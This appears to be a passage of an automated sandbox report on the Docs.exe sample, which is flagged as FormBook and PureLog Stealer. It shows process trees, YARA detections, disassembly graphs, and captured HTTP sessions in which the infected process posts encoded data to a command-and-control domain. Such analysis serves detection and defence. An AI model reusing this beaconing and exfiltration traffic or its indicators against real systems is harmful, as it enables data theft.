                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.54974218.139.62.226801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:30:17.143877029 CET1872OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1242
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 4e 79 2b 32 64 6b 36 55 65 78 41 78 44 4a 61 2b 47 64 36 54 65 31 47 7a 78 63 31 51 61 45 4b 68 6a 4b 4c 71 4b 6b 45 56 6b 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 38 44 54 63 78 2f 58 7a 70 70 79 33 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 4a 7a [TRUNCATED]
                                                            Data Ascii: rvEtL=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAxMuPqa4OlDhG3pn7a3bivS6IMttVEsDrk54eLpzQjriV3+EoVO/jeVY2YOQXrZ4aR/Ywd8I3NJ+OO2qdSqIfBsBdvvO8VHuUjeV9tA7T/cbp0y0tXutIfwgo2/a163oWQtVGTpjhNy+2dk6UexAxDJa+Gd6Te1Gzxc1QaEKhjKLqKkEVkzcr47SpvyA0JEnqN/jxGfsA5X98ZQuNroOvm71EPNUCwR4qcJtJ0/i7h42FCBN8DTcx/Xzppy3vLafteYepijPeh69Sfu6mBn7C4pXsTytPOpxW6Jzog6zWptYDL6Bet4o4SVbmbjWnX2CTlHtQ0cFCwzG0/2OMg8MsyWFJ+mIQa3VWwWIJ2Yv1GqCI5IVk97ep8hS4G38KPoCNpb0STBXQGHOeREsURpDhrXVt2SDez3AZRG5xA64kfbllKGGAlO08cUJI9gA54Sl5BXO4gEZhgq7BW3had7Pj4MuhA8tqeGUIXxi0RCvI12lkQBg0LdQrTI63pUNlmdsLsHe8lFFbPGVFBbp938NLZlLS5650PmJ5Mfbes3PXFfMFfd7qgzvbVDdFQThfI8LZk3Tu+kYbjvrKFbcBfp+upSKKnQXUT3J6ATGjwojImt9DXFuIT69495bikLND9HmCyf8ZWDii/MH6SB0UeL66uM1ZRWLkXtFNygtXeqhm/3K59vhJrpx8OPDjtjo/BICAmtO4E1PaEd7vvLodyS/Dgm2/wntqnWF6/cmsYHpfwH6ue7IUNJJ9FFaepKBWh8yrDsJdHamLNILR0YRFggGXJhDZzX1wYi9rDEmSN3GntDspXfp7xeBLj+tqhxlMQOTkSETz2XfmojtcD5zwx9yuopUreJ3k/7gBn59kU2v7eJM+OOsZWS8wwOUfJ0Hym3r6RvfbsEB5SHFNZEiezK9yhfhCzdf8Kb2bOuL72hGi+KN22Q/PR/L/wyYmmxuw4yFh2sjwu [TRUNCATED]
                                                            Nov 28, 2024 18:30:18.727408886 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.54974318.139.62.226801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:30:19.794307947 CET558OUTGET /y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.taxiquynhonnew.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 28, 2024 18:30:21.433264971 CET522INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:12:28:26
                                                            Start date:28/11/2024
                                                            Path:C:\Users\user\Desktop\Docs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Docs.exe"
                                                            Imagebase:0x790000
                                                            File size:799'232 bytes
                                                            MD5 hash:DB3260038649D2048D4D203B210C42AD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:12:28:30
                                                            Start date:28/11/2024
                                                            Path:C:\Users\user\Desktop\Docs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Docs.exe"
                                                            Imagebase:0xad0000
                                                            File size:799'232 bytes
                                                            MD5 hash:DB3260038649D2048D4D203B210C42AD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:12:29:16
                                                            Start date:28/11/2024
                                                            Path:C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe"
                                                            Imagebase:0x3c0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:7
                                                            Start time:12:29:18
                                                            Start date:28/11/2024
                                                            Path:C:\Windows\SysWOW64\tzutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                            Imagebase:0xbc0000
                                                            File size:48'640 bytes
                                                            MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:8
                                                            Start time:12:29:30
                                                            Start date:28/11/2024
                                                            Path:C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe"
                                                            Imagebase:0x3c0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:9
                                                            Start time:12:29:42
                                                            Start date:28/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:37
                                                              Total number of Limit Nodes:3
                                                              execution_graph 27555 e84668 27556 e8467a 27555->27556 27557 e84686 27556->27557 27559 e84779 27556->27559 27560 e8479d 27559->27560 27564 e84888 27560->27564 27568 e84878 27560->27568 27565 e848af 27564->27565 27566 e8498c 27565->27566 27572 e844b0 27565->27572 27566->27566 27570 e84888 27568->27570 27569 e8498c 27569->27569 27570->27569 27571 e844b0 CreateActCtxA 27570->27571 27571->27569 27573 e85918 CreateActCtxA 27572->27573 27575 e859db 27573->27575 27576 7236cc7 CloseHandle 27577 7236d2f 27576->27577 27578 e8d0c0 27579 e8d106 27578->27579 27583 e8d6a8 27579->27583 27586 e8d699 27579->27586 27580 e8d1f3 27589 e8d2fc 27583->27589 27587 e8d6d6 27586->27587 27588 e8d2fc DuplicateHandle 27586->27588 27587->27580 27588->27587 27590 e8d710 DuplicateHandle 27589->27590 27591 e8d6d6 27590->27591 27591->27580 27592 e8ad30 27595 e8ae28 27592->27595 27593 e8ad3f 27596 e8ae5c 27595->27596 27597 e8ae39 27595->27597 27596->27593 27597->27596 27598 e8b060 GetModuleHandleW 27597->27598 27599 e8b08d 27598->27599 27599->27593 27600 7233f98 27601 7233fe6 DrawTextExW 27600->27601 27603 723403e 27601->27603

                                                              Executed Functions

                                                              Function 0723AA60 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 295 723aa60-723aa81 296 723aa83 295->296 297 723aa88-723ab74 295->297 296->297 299 723b3a3-723b3cb 297->299 300 723ab7a-723acce 297->300 303 723baac-723bab5 299->303 344 723b371-723b3a0 300->344 345 723acd4-723ad2f 300->345 304 723babb-723bad2 303->304 305 723b3d9-723b3e2 303->305 307 723b3e4 305->307 308 723b3e9-723b4dd 305->308 307->308 326 723b507 308->326 327 723b4df-723b4eb 308->327 331 723b50d-723b52d 326->331 329 723b4f5-723b4fb 327->329 330 723b4ed-723b4f3 327->330 332 723b505 329->332 330->332 335 723b52f-723b55d 331->335 336 723b58d-723b605 331->336 332->331 342 723b569-723b588 335->342 355 723b607-723b65a 336->355 356 723b65c-723b69f 336->356 349 723baa9 342->349 344->299 352 723ad31 345->352 353 723ad34-723ad3f 345->353 349->303 352->353 357 723b283-723b289 353->357 385 723b6aa-723b6b0 355->385 356->385 358 723ad44-723ad62 357->358 359 723b28f-723b30c 357->359 362 723ad64-723ad68 358->362 363 723adb9-723adce 358->363 399 723b35b-723b361 359->399 362->363 368 723ad6a-723ad75 362->368 365 723add0 363->365 366 723add5-723adeb 363->366 365->366 370 723adf2-723ae09 366->370 371 723aded 366->371 372 723adab-723adb1 368->372 376 723ae10-723ae26 370->376 377 723ae0b 370->377 371->370 374 723adb3-723adb4 372->374 375 723ad77-723ad7b 372->375 379 723ae37-723aea8 374->379 381 723ad81-723ad99 375->381 382 723ad7d 375->382 383 723ae28 376->383 384 723ae2d-723ae34 376->384 377->376 386 723aeaa 379->386 387 723aebe-723b036 379->387 389 723ada0-723ada8 381->389 390 723ad9b 381->390 382->381 383->384 384->379 391 723b707-723b713 385->391 386->387 392 723aeac-723aeb8 386->392 400 723b038 387->400 401 723b04c-723b187 387->401 389->372 390->389 393 723b6b2-723b6d4 391->393 394 723b715-723b79b 391->394 392->387 395 723b6d6 393->395 396 723b6db-723b704 393->396 421 723b920-723b929 394->421 395->396 396->391 404 723b363-723b369 399->404 405 723b30e-723b358 399->405 400->401 406 723b03a-723b046 400->406 414 723b1eb-723b200 401->414 415 723b189-723b18d 401->415 404->344 405->399 406->401 417 723b202 414->417 418 723b207-723b228 414->418 415->414 419 723b18f-723b19e 415->419 417->418 423 723b22a 418->423 424 723b22f-723b24e 418->424 420 723b1dd-723b1e3 419->420 425 723b1a0-723b1a4 420->425 426 723b1e5-723b1e6 420->426 427 723b7a0-723b7b5 421->427 428 723b92f-723b988 421->428 423->424 429 723b250 424->429 430 723b255-723b275 424->430 431 723b1a6-723b1aa 425->431 432 723b1ae-723b1cf 425->432 437 723b280 426->437 433 723b7b7 427->433 434 723b7be-723b914 427->434 452 723b98a-723b9bd 428->452 453 723b9bf-723b9e9 428->453 429->430 435 723b277 430->435 436 723b27c 430->436 431->432 439 723b1d1 432->439 440 723b1d6-723b1da 432->440 433->434 441 723b893-723b8d3 433->441 442 723b7c4-723b804 433->442 443 723b809-723b849 433->443 444 723b84e-723b88e 433->444 457 723b91a 434->457 435->436 436->437 437->357 439->440 440->420 441->457 442->457 443->457 444->457 461 723b9f2-723ba9d 452->461 453->461 457->421 461->349
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'pq$TJuq$Tepq$ptq$xbsq
                                                              • API String ID: 0-4058655881
                                                              • Opcode ID: f2eef064f2385205aad544551fae37916e22b4e1ef4dc13945a1f613192a3791
                                                              • Instruction ID: 51e733ea30d46dabe88ee358221e4b1a50f2360fbb4fba3b17054fe28c6f2622
                                                              • Opcode Fuzzy Hash: f2eef064f2385205aad544551fae37916e22b4e1ef4dc13945a1f613192a3791
                                                              • Instruction Fuzzy Hash: 83B2B4B5E10628CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                              Function 0723A7B8 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 617 723a7b8-723a7c5 618 723a7a1-723a7a7 617->618 619 723a7c7-723a7e7 617->619 652 723a7a9 call 723aa60 618->652 653 723a7a9 call 723b3d0 618->653 654 723a7a9 call 723aa4f 618->654 620 723a7e9 619->620 621 723a7ee-723aa4d 619->621 620->621 622 723a7af-723a7b3 652->622 653->622 654->622
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'pq
                                                              • API String ID: 0-1798494419
                                                              • Opcode ID: cfc97f6661872e764dd04b4e561c869e9fbd91d48c4526fd0680eedd5b1fef87
                                                              • Instruction ID: dea34c7edaab74bed7236f68bf19dc4d5d98e702cd6d697f756a2ae2c42e1ad6
                                                              • Opcode Fuzzy Hash: cfc97f6661872e764dd04b4e561c869e9fbd91d48c4526fd0680eedd5b1fef87
                                                              • Instruction Fuzzy Hash: F9715DB1E2120A9FE745DF7AE98569A7BF3EF88300F14D429E404A7368EA751946CF40
                                                              Function 0723D708 Relevance: .2, Instructions: 239COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa5db7a91cdbe303189792ab59e1a8b9c1ad8849d54779572e7e06e264dfdf9a
                                                              • Instruction ID: b3c99ac45285d8a8d58f730977d66d1ed484a2a67de93fd6a46e464a28fcc122
                                                              • Opcode Fuzzy Hash: fa5db7a91cdbe303189792ab59e1a8b9c1ad8849d54779572e7e06e264dfdf9a
                                                              • Instruction Fuzzy Hash: 5CA1E2F5E24229CFDB14CFA6C8447EDBBB6BF8A301F10906AD409A7251DB745A86CF40
                                                              Function 0723D6FA Relevance: .2, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12d46c957160a44659ec635cc2c9f2cf9ff616d843d5a59b1222b386aa942788
                                                              • Instruction ID: cadfaa2e0aab021a693cb307971f0d6ea70798dc4551369083bc41b747db31cb
                                                              • Opcode Fuzzy Hash: 12d46c957160a44659ec635cc2c9f2cf9ff616d843d5a59b1222b386aa942788
                                                              • Instruction Fuzzy Hash: C9A1F4F5E25229CFDB14CFA5C8447EDBBB2BF8A301F10906AD409AB251DB745A86CF40
                                                              Function 0723DCFE Relevance: .2, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1697e12bbd7a3de113d616c8d83affbda39b4c81af3be39994a6cff31adf9f3
                                                              • Instruction ID: 1444ec45e8d43c1512c68d1fb059d25870d2c9baa087645241f9ead250a0fbf4
                                                              • Opcode Fuzzy Hash: c1697e12bbd7a3de113d616c8d83affbda39b4c81af3be39994a6cff31adf9f3
                                                              • Instruction Fuzzy Hash: CE8100F4E29218CFCB14DFA9C484AEDBBF5BB4A300F10A55AD409AB316D7B09985CF50
                                                              Function 0723DC1A Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b830e138542d4b971f21958c99ec4d231a853e854bc998f2d42dbc93a42d6be
                                                              • Instruction ID: 91121f1f635ffe8c306ce279552bacc94c7db30fba77a6a8fad244d113936556
                                                              • Opcode Fuzzy Hash: 8b830e138542d4b971f21958c99ec4d231a853e854bc998f2d42dbc93a42d6be
                                                              • Instruction Fuzzy Hash: D231C3B1E156188BDB18CFABC94469EFFF3AFC8300F18C16AD818AB265EB7055458F50
                                                              Function 0723DC28 Relevance: .1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bb131691f4d36ae36285f067bb3cccaa4b2b9c63fb1035c295b674a8e27ad75
                                                              • Instruction ID: 188f4f71a7dd730256276f60bc2ee6de5f44ba3737a63b0193d2baf7820760f2
                                                              • Opcode Fuzzy Hash: 2bb131691f4d36ae36285f067bb3cccaa4b2b9c63fb1035c295b674a8e27ad75
                                                              • Instruction Fuzzy Hash: 5C3191B1E146188BEB18CFABD94469EFEF7AFC8300F14C16AD418A7265EB7055418F50
                                                              Function 00E8AE28 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 488 e8ae28-e8ae37 489 e8ae39-e8ae46 call e8a14c 488->489 490 e8ae63-e8ae67 488->490 495 e8ae48 489->495 496 e8ae5c 489->496 492 e8ae69-e8ae73 490->492 493 e8ae7b-e8aebc 490->493 492->493 499 e8aec9-e8aed7 493->499 500 e8aebe-e8aec6 493->500 546 e8ae4e call e8b0c0 495->546 547 e8ae4e call e8b0b0 495->547 496->490 501 e8aed9-e8aede 499->501 502 e8aefb-e8aefd 499->502 500->499 504 e8aee9 501->504 505 e8aee0-e8aee7 call e8a158 501->505 507 e8af00-e8af07 502->507 503 e8ae54-e8ae56 503->496 506 e8af98-e8afaf 503->506 509 e8aeeb-e8aef9 504->509 505->509 519 e8afb1-e8b010 506->519 510 e8af09-e8af11 507->510 511 e8af14-e8af1b 507->511 509->507 510->511 513 e8af28-e8af31 call e8a168 511->513 514 e8af1d-e8af25 511->514 520 e8af3e-e8af43 513->520 521 e8af33-e8af3b 513->521 514->513 539 e8b012-e8b058 519->539 522 e8af61-e8af6e 520->522 523 e8af45-e8af4c 520->523 521->520 530 e8af70-e8af8e 522->530 531 e8af91-e8af97 522->531 523->522 524 e8af4e-e8af5e call e8a178 call e8a188 523->524 524->522 530->531 541 e8b05a-e8b05d 539->541 542 e8b060-e8b08b GetModuleHandleW 539->542 541->542 543 e8b08d-e8b093 542->543 544 e8b094-e8b0a8 542->544 543->544 546->503 547->503
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8B07E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: c765892ef1e6bcc02bb3283f5f75d14b17f6a3706ab7338e0029a2d6d0162cce
                                                              • Instruction ID: d79a47a1b49ce44b65a5f0c555cb1d689734f49fbb572794dbf31619da8c6e33
                                                              • Opcode Fuzzy Hash: c765892ef1e6bcc02bb3283f5f75d14b17f6a3706ab7338e0029a2d6d0162cce
                                                              • Instruction Fuzzy Hash: 807146B0A00B058FE724EF29D44575ABBF1FF88304F14892EE48AE7A50DB74E845CB91
